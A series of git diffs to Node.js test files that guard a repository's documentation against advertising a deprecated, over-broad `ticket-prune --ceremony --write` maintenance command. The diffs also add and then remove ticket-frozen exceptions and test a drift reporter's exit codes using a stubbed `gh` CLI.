+// If you are here because this test is red: fix the listed file(s) by removing
+// `--write` from the ceremony command. Add an exception ONLY if the path is
+// frozen by an active ticket, and name that ticket.
+
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { execFileSync } from 'node:child_process';
+import { join, dirname } from 'node:path';
+import { fileURLToPath } from 'node:url';
+
+const REPO = join(dirname(fileURLToPath(import.meta.url)), '..', '..');
+
+/** Tracked text files that could carry operator instructions. */
+function trackedDocs() {
+  const out = execFileSync('git', ['ls-files', '-z'], { cwd: REPO, encoding: 'utf8', maxBuffer: 32 * 1024 * 1024 });
+  return out.split('\0').filter((f) => /\.(md|mdx|txt)$/.test(f));
+}
+
+// Matches the flags in either order, tolerating other flags between them, but
+// only within a single command line — so prose *describing* the combination
+// (e.g. a historical acceptance criterion) is not caught, only runnable lines.
+const COMBINED = /^[^\n]*\bticket-prune\b[^\n]*(--ceremony[^\n]*--write|--write[^\n]*--ceremony)/;
+
+// A usage synopsis lists every flag as an optional group:
+//   ticket-prune [--tickets path] [--base-ref ref] [--write] [--ceremony] [--json]
+// That is a flag LISTING, not an invocation combining them, and matching it would
+// make the guard fire on every doc that documents the tool at all. Bracketed
+// groups are removed before matching; a real command never brackets its flags.
+const stripOptional = (line) => line.replace(/\[[^\]]*\]/g, '');
+
+// Documents that intentionally record the combination as history rather than
+// instructing anyone to run it. Narrow and explicit: a path only earns a place
+// here if the mention is a record of what was verified, not a runnable step.
+const HISTORICAL = new Set([
+  'docs/specs/ticket-completion-rail-cleanup.md', // AC3 records the verified invocation
+]);
+
+// Known-bad files whose paths are frozen by an ACTIVE ticket, so the fix cannot
+// land here. Each entry names the blocking ticket. Remove the entry with the fix.
+const FROZEN_PENDING = new Map([
+  ['plugins/adlc-claude-code/commands/adlc-maintain.md', 'T51 (active; rails plugins/adlc-claude-code/commands/**)'],
+  ['plugins/adlc-opencode/command/adlc-maintain.md', 'T53 (active; rails plugins/adlc-opencode/**)'],
+]);
+
+const scanFor = (predicate) => {
+  const hits = [];
+  for (const file of trackedDocs()) {
+    if (HISTORICAL.has(file)) continue;
+    if (!predicate(file)) continue;
+    let text;
+    try { text = readFileSync(join(REPO, file), 'utf8'); } catch { continue; }
+    for (const [i, line] of text.split('\n').entries()) {
+      if (COMBINED.test(stripOptional(line))) hits.push(`${file}:${i + 1}: ${line.trim()}`);
+    }
+  }
+  return hits;
+};
+
+test('no shipped doc advertises `ticket-prune --ceremony --write`', () => {
+  const offenders = scanFor((f) => !FROZEN_PENDING.has(f));
+  assert.deepEqual(offenders, [],
+    'these files instruct an operator to run the ceremony with --write, which also ' +
+    'completes rails-less tickets outside the reviewed set:\n  ' + offenders.join('\n  '));
+});
+
+// SELF-CLEANING. If a frozen file no longer carries the pattern, the exception has
+// served its purpose and must go — otherwise the allowance outlives the problem
+// and silently weakens the guard for that path forever.
+test('every frozen-pending exception is still necessary', () => {
+  const stale = [];
+  for (const [file, ticket] of FROZEN_PENDING) {
+    if (scanFor((f) => f === file).length === 0) stale.push(`${file} (was blocked by ${ticket})`);
+  }
+  assert.deepEqual(stale, [],
+    'these files are fixed — delete their FROZEN_PENDING entries so the guard covers ' +
+    'them again:\n  ' + stale.join('\n  '));
+});
+
+// Guards the guard: if the pattern stops matching the shape it is meant to catch,
+// the test above would pass vacuously across the whole repo.
+test('the detector matches the shapes it is meant to catch', () => {
+  for (const line of [
+    'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin/main',
+    'ADLC_RAILS_BYPASS=1 ticket-prune --write --ceremony',
+    '  ADLC_RAILS_BYPASS=1 node packages/ticket-prune/bin/ticket-prune.mjs --ceremony --write',
+  ]) {
+    assert.ok(COMBINED.test(line), `should have matched: ${line}`);
+  }
+});
+
+test('the detector does not flag the safe command, a usage synopsis, or lone --write', () => {
+  for (const line of [
+    'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main',
+    'ticket-prune --write', // tombstoning alone is a legitimate, separate operation
+    'ticket-prune --base-ref origin/main --json',
+    // Usage synopsis: lists both flags as optional, does not invoke them together.
+    'ticket-prune [--tickets path] [--base-ref ref] [--write] [--ceremony] [--json]',
+  ]) {
+    assert.ok(!COMBINED.test(stripOptional(line)), `should NOT have matched: ${line}`);
+  }
+});

--- a/scripts/test/ceremony-command-safety.test.mjs
+++ b/scripts/test/ceremony-command-safety.test.mjs
@@ -48,6 +48,16 @@ function trackedDocs() {
 // (e.g. a historical acceptance criterion) is not caught, only runnable lines.
 const COMBINED = /^[^\n]*\bticket-prune\b[^\n]*(--ceremony[^\n]*--write|--write[^\n]*--ceremony)/;
 
+// #208: no doc may show a RUNNABLE `ticket-prune --ceremony` command line (the
+// flag is deprecated; completion is per-ticket via `adlc ticket complete`). This
+// must fire ONLY on a command line, not on prose that mentions the flag (the
+// deprecation notes do). A command line starts — after optional indent, a `$ `
+// prompt, or an `ENV=val ` prefix — with the invocation token itself; a prose
+// mention has a backtick or other text before `ticket-prune`. Anchoring at line
+// start after those prefixes is what makes the distinction.
+const RUNNABLE_CEREMONY =
+  /^\s*(\$ )?([A-Z_]+=\S+ )*(node \S*|adlc )?ticket-prune(\.mjs)?\s[^\n]*--ceremony\b/;
+
 // A usage synopsis lists every flag as an optional group:
 //   ticket-prune [--tickets path] [--base-ref ref] [--write] [--ceremony] [--json]
 // That is a flag LISTING, not an invocation combining them, and matching it would
@@ -62,6 +72,11 @@ const HISTORICAL = new Set([
   'docs/specs/ticket-completion-rail-cleanup.md', // AC3 records the verified invocation
 ]);
 
+// A line offends if it advertises the --ceremony --write combination OR shows a
+// runnable `ticket-prune --ceremony` command (deprecated, #208). Both fire only
+// on runnable lines, never on prose that mentions the flag.
+const lineOffends = (line) => COMBINED.test(stripOptional(line)) || RUNNABLE_CEREMONY.test(line);
+
 function offenders() {
   const hits = [];
   for (const file of trackedDocs()) {
@@ -69,7 +84,7 @@ function offenders() {
     let text;
     try { text = readFileSync(join(REPO, file), 'utf8'); } catch { continue; }
     for (const [i, line] of text.split('\n').entries()) {
-      if (COMBINED.test(stripOptional(line))) hits.push(`${file}:${i + 1}: ${line.trim()}`);
+      if (lineOffends(line)) hits.push(`${file}:${i + 1}: ${line.trim()}`);
     }
   }
   return hits;
@@ -77,34 +92,40 @@ function offenders() {
 
 // ---- the repo-wide guard (no exceptions) ----
 
-test('no shipped doc advertises `ticket-prune --ceremony --write`', () => {
+test('no shipped doc advertises a runnable `ticket-prune --ceremony` command', () => {
   assert.deepEqual(offenders(), [],
-    'these files instruct an operator to run the ceremony with --write, which also ' +
-    'completes rails-less tickets outside the reviewed set — remove --write:\n  ' +
+    'these files show a runnable ticket-prune --ceremony command; it is deprecated ' +
+    '(and --write also completes rails-less tickets outside the reviewed set). ' +
+    'Complete per-ticket with `adlc ticket complete <id> --write --authorize --json`:\n  ' +
     offenders().join('\n  '));
 });
 
-// Guards the guard: if the pattern stops matching the shape it is meant to catch,
-// the test above would pass vacuously across the whole repo.
-test('the detector matches the shapes it is meant to catch', () => {
+// Guards the guard: if the patterns stop matching the shapes they target, the test
+// above would pass vacuously across the whole repo.
+test('the detector matches the runnable shapes it is meant to catch', () => {
   for (const line of [
     'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin/main',
     'ADLC_RAILS_BYPASS=1 ticket-prune --write --ceremony',
     '  ADLC_RAILS_BYPASS=1 node packages/ticket-prune/bin/ticket-prune.mjs --ceremony --write',
+    'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main', // bare ceremony, still runnable
+    '  ticket-prune --ceremony',
   ]) {
-    assert.ok(COMBINED.test(line), `should have matched: ${line}`);
+    assert.ok(lineOffends(line), `should have matched: ${line}`);
   }
 });
 
-test('the detector does not flag the safe command, a usage synopsis, or lone --write', () => {
+test('the detector does not flag prose mentions, a usage synopsis, or lone --write', () => {
   for (const line of [
-    'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main',
+    // Prose mentions of the deprecated flag — must NOT be flagged.
+    '`ticket-prune --ceremony` is deprecated; use `adlc ticket complete <id>` instead.',
+    'the deprecated bulk `ticket-prune --ceremony` (evidence-less, legacy-store-only; #208).',
+    '| `--ceremony` | **Deprecated (#208).** Fails closed and redirects. |',
     'ticket-prune --write', // tombstoning alone is a legitimate, separate operation
     'ticket-prune --base-ref origin/main --json',
-    // Usage synopsis: lists both flags as optional, does not invoke them together.
-    'ticket-prune [--tickets path] [--base-ref ref] [--write] [--ceremony] [--json]',
+    // Usage synopsis: lists flags as optional groups, does not invoke them.
+    'ticket-prune [--tickets path] [--base-ref ref] [--write] [--json]',
   ]) {
-    assert.ok(!COMBINED.test(stripOptional(line)), `should NOT have matched: ${line}`);
+    assert.ok(!lineOffends(line), `should NOT have matched: ${line}`);
   }
 });
 

--- a/scripts/test/ceremony-command-safety.test.mjs
+++ b/scripts/test/ceremony-command-safety.test.mjs
@@ -225,5 +225,5 @@ test('--json suppresses the legacy-migration offer even when both streams are a 
 test('the reporter renders the completion command WITH --json', async () => {
   const { renderIssueBody } = await import('../ceremony-drift.mjs');
   const body = renderIssueBody([{ id: 'T7', reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' }]);
-  assert.match(body, /adlc-tickets complete T7 --write --authorize --json/);
+  assert.match(body, /adlc ticket complete T7 --write --authorize --json/);
 });

--- a/scripts/test/ceremony-command-safety.test.mjs
+++ b/scripts/test/ceremony-command-safety.test.mjs
@@ -1,7 +1,8 @@
 // ceremony-command-safety.test.mjs — no shipped doc may advertise the combined
-// `--ceremony --write` invocation.
+// `--ceremony --write` invocation, and the completion command the reporter
+// renders must be non-interactive.
 //
-// WHY THIS IS A REPO-WIDE GUARD RATHER THAN FOUR EDITS
+// WHY THIS IS A REPO-WIDE GUARD RATHER THAN N EDITS
 //
 // `--ceremony --write` does not do only the ceremony. `--write` additionally
 // tombstones rails-less stale tickets, which the preceding dry-run report does
@@ -11,36 +12,28 @@
 //   --ceremony --write  ->  railed=COMPLETED   rails-less=COMPLETED
 //   --ceremony          ->  railed=COMPLETED   rails-less=untouched
 //
-// The instruction was duplicated across four shipped integrations plus the
-// package README, and two of those copies are currently frozen by ACTIVE tickets
-// (T51 owns plugins/adlc-claude-code/commands/**, T53 owns
-// plugins/adlc-opencode/**). rails-guard correctly denies editing them, and
-// ADLC_RAILS_BYPASS would mean overwriting files someone is building against
-// right now — the bypass is for stale rails, not live ones.
+// The instruction was duplicated across the four `/adlc:adlc-maintain` docs plus
+// the package README and the sweep runbook. This guard asserts none of them
+// advertise the unsafe form, and fails loudly if a new doc reintroduces it.
 //
-// So instead of forcing those edits, the invariant is asserted here, with the two
-// frozen files carried as EXPLICIT, TICKETED exceptions rather than silently
-// skipped. The guard is live for every other shipped doc immediately, and the
-// remaining debt is named, attributed, and visible in a test rather than living
-// only in a PR description nobody re-reads.
+// (History: two of those files were once frozen by active tickets T51/T53, and
+// this guard carried a self-cleaning `FROZEN_PENDING` exception for them. T51/T53
+// completed, the rails expired, the files were fixed — so the exception is gone
+// and the guard is now unconditional. If a future ticket ever freezes a doc that
+// carries the unsafe command, reinstate a named, self-cleaning exception rather
+// than a bare skip; see the git history of this file for the pattern.)
 //
-// The exception list is SELF-CLEANING: a second test asserts every entry is still
-// necessary, so the moment T51/T53 correct their file the exception itself starts
-// failing and must be deleted. It cannot quietly become permanent.
-//
-// If you are here because this test is red: fix the listed file(s) by removing
-// `--write` from the ceremony command. Add an exception ONLY if the path is
-// frozen by an active ticket, and name that ticket.
+// If you are here because this test is red: remove `--write` from the
+// `ticket-prune --ceremony` command in the listed file(s).
 
 import { test } from 'node:test';
 import assert from 'node:assert/strict';
-import { readFileSync } from 'node:fs';
+import { readFileSync, mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'node:fs';
 import { execFileSync } from 'node:child_process';
 import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
-import { detectTicketStore, shouldOfferLegacyMigration } from '../../packages/tickets/index.mjs';
-import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'node:fs';
 import { tmpdir } from 'node:os';
+import { detectTicketStore, shouldOfferLegacyMigration } from '../../packages/tickets/index.mjs';
 
 const REPO = join(dirname(fileURLToPath(import.meta.url)), '..', '..');
 
@@ -69,37 +62,10 @@ const HISTORICAL = new Set([
   'docs/specs/ticket-completion-rail-cleanup.md', // AC3 records the verified invocation
 ]);
 
-// Known-bad files whose paths are frozen by an ACTIVE ticket, so the fix cannot
-// land here. Keyed by file → the ticket id whose rails freeze it. The exception
-// is valid ONLY while that ticket is genuinely active; the self-cleaning test
-// below verifies that against the live store, not just the file text.
-const FROZEN_PENDING = new Map([
-  ['plugins/adlc-claude-code/commands/adlc-maintain.md', 'T51'],
-  ['plugins/adlc-opencode/command/adlc-maintain.md', 'T53'],
-]);
-
-/**
- * Load the active ticket set through the canonical store detector, which handles
- * BOTH backends. Reading `.adlc/tickets.json` directly (as an earlier version
- * did) throws ENOENT the moment the repo migrates to the directory store
- * (`.adlc/tickets/`) — and the completion command this very branch advertises can
- * trigger that migration — which would turn this guard into a red wall on every
- * subsequent PR. Going through detectTicketStore keeps it backend-agnostic.
- */
-function loadTickets() {
-  return detectTicketStore({ root: REPO }).load().tickets ?? [];
-}
-
-/** A ticket is active iff it is present in the store and not `completed`. */
-function activeTicketIds() {
-  return new Set(loadTickets().filter((t) => t?.completed !== true).map((t) => t?.id));
-}
-
-const scanFor = (predicate) => {
+function offenders() {
   const hits = [];
   for (const file of trackedDocs()) {
     if (HISTORICAL.has(file)) continue;
-    if (!predicate(file)) continue;
     let text;
     try { text = readFileSync(join(REPO, file), 'utf8'); } catch { continue; }
     for (const [i, line] of text.split('\n').entries()) {
@@ -107,51 +73,15 @@ const scanFor = (predicate) => {
     }
   }
   return hits;
-};
+}
 
-test('no shipped doc advertises `ticket-prune --ceremony --write` (except the two rail-frozen files tracked in FROZEN_PENDING)', () => {
-  const offenders = scanFor((f) => !FROZEN_PENDING.has(f));
-  assert.deepEqual(offenders, [],
+// ---- the repo-wide guard (no exceptions) ----
+
+test('no shipped doc advertises `ticket-prune --ceremony --write`', () => {
+  assert.deepEqual(offenders(), [],
     'these files instruct an operator to run the ceremony with --write, which also ' +
-    'completes rails-less tickets outside the reviewed set:\n  ' + offenders.join('\n  '));
-});
-
-// SELF-CLEANING, on TWO independent conditions — either dissolves the exception:
-//
-//   (a) the file no longer carries the unsafe command (someone fixed it), or
-//   (b) the blocking ticket is no longer active (its rails expired, so the file
-//       is now editable and the exception has no justification left).
-//
-// A previous version checked only (a). That let the exception outlive its
-// blocker: once T51/T53 completed, the file stayed editable and unsafe, yet the
-// suite stayed green because the bad text was still there and still excused. An
-// exception that survives the removal of its own justification is not a temporary
-// allowance, it is a permanent hole. Failing on (b) forces the fix the moment the
-// rail unfreezes.
-test('every frozen-pending exception is still justified (file unfixed AND blocker active)', () => {
-  const active = activeTicketIds();
-  const invalid = [];
-  for (const [file, ticket] of FROZEN_PENDING) {
-    const stillUnsafe = scanFor((f) => f === file).length > 0;
-    if (!stillUnsafe) {
-      invalid.push(`${file}: fixed — remove its FROZEN_PENDING entry so the guard covers it again`);
-    } else if (!active.has(ticket)) {
-      invalid.push(`${file}: blocking ticket ${ticket} is no longer active — the rail has expired, ` +
-        `so fix the file (remove --write) and delete this exception`);
-    }
-  }
-  assert.deepEqual(invalid, [], 'stale FROZEN_PENDING exceptions:\n  ' + invalid.join('\n  '));
-});
-
-// The exception file names two ticket ids; if a typo or rename made them
-// unresolvable, `activeTicketIds()` would never contain them and (b) would fire —
-// but assert presence explicitly so the failure reads as "unknown ticket" rather
-// than "blocker completed".
-test('every frozen-pending blocker id exists in the ticket store', () => {
-  const known = new Set(loadTickets().map((t) => t?.id));
-  for (const ticket of FROZEN_PENDING.values()) {
-    assert.ok(known.has(ticket), `FROZEN_PENDING names ${ticket}, which is not in the ticket store`);
-  }
+    'completes rails-less tickets outside the reviewed set — remove --write:\n  ' +
+    offenders().join('\n  '));
 });
 
 // Guards the guard: if the pattern stops matching the shape it is meant to catch,
@@ -178,28 +108,11 @@ test('the detector does not flag the safe command, a usage synopsis, or lone --w
   }
 });
 
-
-// ---- F3: the guard loads through the canonical detector, so a directory-store
-// migration does not turn it into a red wall ----
-
-test('the ticket loader works on a directory-store fixture (no ENOENT after migration)', () => {
-  const dir = mkdtempSync(join(tmpdir(), 'adlc-guard-dir-'));
-  try {
-    mkdirSync(join(dir, '.adlc', 'tickets'), { recursive: true });
-    writeFileSync(join(dir, '.adlc', 'tickets', '.store.json'),
-      JSON.stringify({ format: 'adlc-ticket-directory', version: 1 }));
-    // A directory store keyed by the canonical hashed shard name.
-    const store = detectTicketStore({ root: dir });
-    // Loading must not throw (the old readFileSync('.adlc/tickets.json') did).
-    assert.doesNotThrow(() => store.load());
-    assert.equal(store.constructor.name, 'DirectoryTicketStore');
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
-
-// ---- F4: the advertised command carries --json, which suppresses the
-// interactive legacy->directory migration even in an administrator's TTY ----
+// ---- the reporter's completion command is non-interactive ----
+//
+// `adlc ticket complete <id> … --json`. The `--json` is load-bearing: on a legacy
+// store the CLI otherwise offers an interactive migration before mutating, and an
+// admin who accepted it would migrate the WHOLE store to complete one ticket.
 
 test('--json suppresses the legacy-migration offer even when both streams are a TTY', () => {
   const dir = mkdtempSync(join(tmpdir(), 'adlc-guard-legacy-'));
@@ -209,8 +122,6 @@ test('--json suppresses the legacy-migration offer even when both streams are a 
     const store = detectTicketStore({ root: dir });
     assert.equal(store.constructor.name, 'LegacyTicketStore');
     const tty = { input: { isTTY: true }, output: { isTTY: true } };
-    // The exact gate the advertised command relies on: with --json it does NOT
-    // offer migration; without it (the hazard) it would.
     assert.equal(shouldOfferLegacyMigration(store, { json: true }, tty), false,
       '--json must suppress the migration prompt, so the one-ticket command stays one-ticket');
     assert.equal(shouldOfferLegacyMigration(store, { json: false }, tty), true,

--- a/scripts/test/ceremony-command-safety.test.mjs
+++ b/scripts/test/ceremony-command-safety.test.mjs
@@ -38,6 +38,9 @@ import { readFileSync } from 'node:fs';
 import { execFileSync } from 'node:child_process';
 import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
+import { detectTicketStore, shouldOfferLegacyMigration } from '../../packages/tickets/index.mjs';
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'node:fs';
+import { tmpdir } from 'node:os';
 
 const REPO = join(dirname(fileURLToPath(import.meta.url)), '..', '..');
 
@@ -75,10 +78,21 @@ const FROZEN_PENDING = new Map([
   ['plugins/adlc-opencode/command/adlc-maintain.md', 'T53'],
 ]);
 
+/**
+ * Load the active ticket set through the canonical store detector, which handles
+ * BOTH backends. Reading `.adlc/tickets.json` directly (as an earlier version
+ * did) throws ENOENT the moment the repo migrates to the directory store
+ * (`.adlc/tickets/`) — and the completion command this very branch advertises can
+ * trigger that migration — which would turn this guard into a red wall on every
+ * subsequent PR. Going through detectTicketStore keeps it backend-agnostic.
+ */
+function loadTickets() {
+  return detectTicketStore({ root: REPO }).load().tickets ?? [];
+}
+
 /** A ticket is active iff it is present in the store and not `completed`. */
 function activeTicketIds() {
-  const store = JSON.parse(readFileSync(join(REPO, '.adlc', 'tickets.json'), 'utf8'));
-  return new Set((store.tickets ?? []).filter((t) => t?.completed !== true).map((t) => t?.id));
+  return new Set(loadTickets().filter((t) => t?.completed !== true).map((t) => t?.id));
 }
 
 const scanFor = (predicate) => {
@@ -134,10 +148,9 @@ test('every frozen-pending exception is still justified (file unfixed AND blocke
 // but assert presence explicitly so the failure reads as "unknown ticket" rather
 // than "blocker completed".
 test('every frozen-pending blocker id exists in the ticket store', () => {
-  const store = JSON.parse(readFileSync(join(REPO, '.adlc', 'tickets.json'), 'utf8'));
-  const known = new Set((store.tickets ?? []).map((t) => t?.id));
+  const known = new Set(loadTickets().map((t) => t?.id));
   for (const ticket of FROZEN_PENDING.values()) {
-    assert.ok(known.has(ticket), `FROZEN_PENDING names ${ticket}, which is not in .adlc/tickets.json`);
+    assert.ok(known.has(ticket), `FROZEN_PENDING names ${ticket}, which is not in the ticket store`);
   }
 });
 
@@ -163,4 +176,54 @@ test('the detector does not flag the safe command, a usage synopsis, or lone --w
   ]) {
     assert.ok(!COMBINED.test(stripOptional(line)), `should NOT have matched: ${line}`);
   }
+});
+
+
+// ---- F3: the guard loads through the canonical detector, so a directory-store
+// migration does not turn it into a red wall ----
+
+test('the ticket loader works on a directory-store fixture (no ENOENT after migration)', () => {
+  const dir = mkdtempSync(join(tmpdir(), 'adlc-guard-dir-'));
+  try {
+    mkdirSync(join(dir, '.adlc', 'tickets'), { recursive: true });
+    writeFileSync(join(dir, '.adlc', 'tickets', '.store.json'),
+      JSON.stringify({ format: 'adlc-ticket-directory', version: 1 }));
+    // A directory store keyed by the canonical hashed shard name.
+    const store = detectTicketStore({ root: dir });
+    // Loading must not throw (the old readFileSync('.adlc/tickets.json') did).
+    assert.doesNotThrow(() => store.load());
+    assert.equal(store.constructor.name, 'DirectoryTicketStore');
+  } finally {
+    rmSync(dir, { recursive: true, force: true });
+  }
+});
+
+// ---- F4: the advertised command carries --json, which suppresses the
+// interactive legacy->directory migration even in an administrator's TTY ----
+
+test('--json suppresses the legacy-migration offer even when both streams are a TTY', () => {
+  const dir = mkdtempSync(join(tmpdir(), 'adlc-guard-legacy-'));
+  try {
+    mkdirSync(join(dir, '.adlc'), { recursive: true });
+    writeFileSync(join(dir, '.adlc', 'tickets.json'), JSON.stringify({ tickets: [{ id: 'T7', title: 'x' }] }));
+    const store = detectTicketStore({ root: dir });
+    assert.equal(store.constructor.name, 'LegacyTicketStore');
+    const tty = { input: { isTTY: true }, output: { isTTY: true } };
+    // The exact gate the advertised command relies on: with --json it does NOT
+    // offer migration; without it (the hazard) it would.
+    assert.equal(shouldOfferLegacyMigration(store, { json: true }, tty), false,
+      '--json must suppress the migration prompt, so the one-ticket command stays one-ticket');
+    assert.equal(shouldOfferLegacyMigration(store, { json: false }, tty), true,
+      'sanity: without --json the offer is what would fire');
+  } finally {
+    rmSync(dir, { recursive: true, force: true });
+  }
+});
+
+// The advertised command must actually contain --json, or the suppression above
+// is moot. Cross-checks the reporter against this guard.
+test('the reporter renders the completion command WITH --json', async () => {
+  const { renderIssueBody } = await import('../ceremony-drift.mjs');
+  const body = renderIssueBody([{ id: 'T7', reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' }]);
+  assert.match(body, /adlc-tickets complete T7 --write --authorize --json/);
 });

--- a/scripts/test/ceremony-command-safety.test.mjs
+++ b/scripts/test/ceremony-command-safety.test.mjs
@@ -67,11 +67,19 @@ const HISTORICAL = new Set([
 ]);
 
 // Known-bad files whose paths are frozen by an ACTIVE ticket, so the fix cannot
-// land here. Each entry names the blocking ticket. Remove the entry with the fix.
+// land here. Keyed by file → the ticket id whose rails freeze it. The exception
+// is valid ONLY while that ticket is genuinely active; the self-cleaning test
+// below verifies that against the live store, not just the file text.
 const FROZEN_PENDING = new Map([
-  ['plugins/adlc-claude-code/commands/adlc-maintain.md', 'T51 (active; rails plugins/adlc-claude-code/commands/**)'],
-  ['plugins/adlc-opencode/command/adlc-maintain.md', 'T53 (active; rails plugins/adlc-opencode/**)'],
+  ['plugins/adlc-claude-code/commands/adlc-maintain.md', 'T51'],
+  ['plugins/adlc-opencode/command/adlc-maintain.md', 'T53'],
 ]);
+
+/** A ticket is active iff it is present in the store and not `completed`. */
+function activeTicketIds() {
+  const store = JSON.parse(readFileSync(join(REPO, '.adlc', 'tickets.json'), 'utf8'));
+  return new Set((store.tickets ?? []).filter((t) => t?.completed !== true).map((t) => t?.id));
+}
 
 const scanFor = (predicate) => {
   const hits = [];
@@ -87,24 +95,50 @@ const scanFor = (predicate) => {
   return hits;
 };
 
-test('no shipped doc advertises `ticket-prune --ceremony --write`', () => {
+test('no shipped doc advertises `ticket-prune --ceremony --write` (except the two rail-frozen files tracked in FROZEN_PENDING)', () => {
   const offenders = scanFor((f) => !FROZEN_PENDING.has(f));
   assert.deepEqual(offenders, [],
     'these files instruct an operator to run the ceremony with --write, which also ' +
     'completes rails-less tickets outside the reviewed set:\n  ' + offenders.join('\n  '));
 });
 
-// SELF-CLEANING. If a frozen file no longer carries the pattern, the exception has
-// served its purpose and must go — otherwise the allowance outlives the problem
-// and silently weakens the guard for that path forever.
-test('every frozen-pending exception is still necessary', () => {
-  const stale = [];
+// SELF-CLEANING, on TWO independent conditions — either dissolves the exception:
+//
+//   (a) the file no longer carries the unsafe command (someone fixed it), or
+//   (b) the blocking ticket is no longer active (its rails expired, so the file
+//       is now editable and the exception has no justification left).
+//
+// A previous version checked only (a). That let the exception outlive its
+// blocker: once T51/T53 completed, the file stayed editable and unsafe, yet the
+// suite stayed green because the bad text was still there and still excused. An
+// exception that survives the removal of its own justification is not a temporary
+// allowance, it is a permanent hole. Failing on (b) forces the fix the moment the
+// rail unfreezes.
+test('every frozen-pending exception is still justified (file unfixed AND blocker active)', () => {
+  const active = activeTicketIds();
+  const invalid = [];
   for (const [file, ticket] of FROZEN_PENDING) {
-    if (scanFor((f) => f === file).length === 0) stale.push(`${file} (was blocked by ${ticket})`);
+    const stillUnsafe = scanFor((f) => f === file).length > 0;
+    if (!stillUnsafe) {
+      invalid.push(`${file}: fixed — remove its FROZEN_PENDING entry so the guard covers it again`);
+    } else if (!active.has(ticket)) {
+      invalid.push(`${file}: blocking ticket ${ticket} is no longer active — the rail has expired, ` +
+        `so fix the file (remove --write) and delete this exception`);
+    }
   }
-  assert.deepEqual(stale, [],
-    'these files are fixed — delete their FROZEN_PENDING entries so the guard covers ' +
-    'them again:\n  ' + stale.join('\n  '));
+  assert.deepEqual(invalid, [], 'stale FROZEN_PENDING exceptions:\n  ' + invalid.join('\n  '));
+});
+
+// The exception file names two ticket ids; if a typo or rename made them
+// unresolvable, `activeTicketIds()` would never contain them and (b) would fire —
+// but assert presence explicitly so the failure reads as "unknown ticket" rather
+// than "blocker completed".
+test('every frozen-pending blocker id exists in the ticket store', () => {
+  const store = JSON.parse(readFileSync(join(REPO, '.adlc', 'tickets.json'), 'utf8'));
+  const known = new Set((store.tickets ?? []).map((t) => t?.id));
+  for (const ticket of FROZEN_PENDING.values()) {
+    assert.ok(known.has(ticket), `FROZEN_PENDING names ${ticket}, which is not in .adlc/tickets.json`);
+  }
 });
 
 // Guards the guard: if the pattern stops matching the shape it is meant to catch,

--- a/scripts/test/ceremony-drift-exit.test.mjs
+++ b/scripts/test/ceremony-drift-exit.test.mjs
@@ -67,7 +67,11 @@ function runWith(ghScript, { repo, env = {} } = {}) {
   try {
     const log = join(binDir, 'calls.txt');
     const ghPath = join(binDir, 'gh');
-    writeFileSync(ghPath, `#!/bin/sh\necho "$*" >> ${log}\n${ghScript}\n`);
+    // Drain stdin first. The reporter pipes the issue body to `gh ... --body-file -`;
+    // real gh reads it, but a stub that printf's and exits leaves the writer on a
+    // closed pipe -> EPIPE -> spurious non-zero exit. Node 22 tolerated the race;
+    // Node 18/20 surfaced it, so this passed locally and failed in CI.
+    writeFileSync(ghPath, `#!/bin/sh\ncat >/dev/null 2>&1\necho "$*" >> ${log}\n${ghScript}\n`);
     chmodSync(ghPath, 0o755);
     const r = spawnSync(process.execPath, [SCRIPT], {
       cwd: repo,

--- a/scripts/test/ceremony-drift-exit.test.mjs
+++ b/scripts/test/ceremony-drift-exit.test.mjs
@@ -1,0 +1,91 @@
+// ceremony-drift-exit.test.mjs — the exit-code contract of the drift reporter.
+//
+// Drives the real script as a subprocess with a stubbed `gh` on PATH, because
+// the property under test is the process exit code, which cannot be observed by
+// importing the module.
+//
+// The contract has two halves, and conflating them was a real defect caught in
+// review: drift EXISTING must never fail the job (that would recreate the
+// blocking-gate problem the design exists to avoid), while the REPORTER being
+// broken must fail loudly (otherwise a revoked token or API error disables the
+// signal indefinitely while every scheduled run still looks green).
+
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, writeFileSync, chmodSync, rmSync } from 'node:fs';
+import { tmpdir } from 'node:os';
+import { join, dirname } from 'node:path';
+import { fileURLToPath } from 'node:url';
+import { spawnSync } from 'node:child_process';
+
+const REPO = join(dirname(fileURLToPath(import.meta.url)), '..', '..');
+const SCRIPT = join(REPO, 'scripts', 'ceremony-drift.mjs');
+
+/**
+ * Run the reporter with a fake `gh` first on PATH.
+ * @param {string} ghScript shell body for the stub
+ */
+function runWith(ghScript, env = {}) {
+  const dir = mkdtempSync(join(tmpdir(), 'adlc-drift-'));
+  try {
+    const ghPath = join(dir, 'gh');
+    writeFileSync(ghPath, `#!/bin/sh\n${ghScript}\n`);
+    chmodSync(ghPath, 0o755);
+    const r = spawnSync(process.execPath, [SCRIPT], {
+      cwd: REPO,
+      encoding: 'utf8',
+      env: {
+        ...process.env,
+        ADLC_RAILS_BYPASS: undefined, // keep the harness hermetic (see issue #204)
+        PATH: `${dir}:${process.env.PATH}`,
+        ...env,
+      },
+    });
+    return { status: r.status, stdout: r.stdout ?? '', stderr: r.stderr ?? '' };
+  } finally {
+    rmSync(dir, { recursive: true, force: true });
+  }
+}
+
+// ---- operational failure must be LOUD ----
+
+test('a failing `gh` exits non-zero (a broken reporter must not look healthy)', () => {
+  const r = runWith('echo "gh: HTTP 403 Resource not accessible by integration" >&2; exit 1');
+  assert.notEqual(r.status, 0, 'expected a non-zero exit when gh fails');
+});
+
+test('a `gh` that returns unparseable JSON exits non-zero', () => {
+  const r = runWith('echo "not json at all"');
+  assert.notEqual(r.status, 0, 'expected a non-zero exit when the gh response cannot be parsed');
+});
+
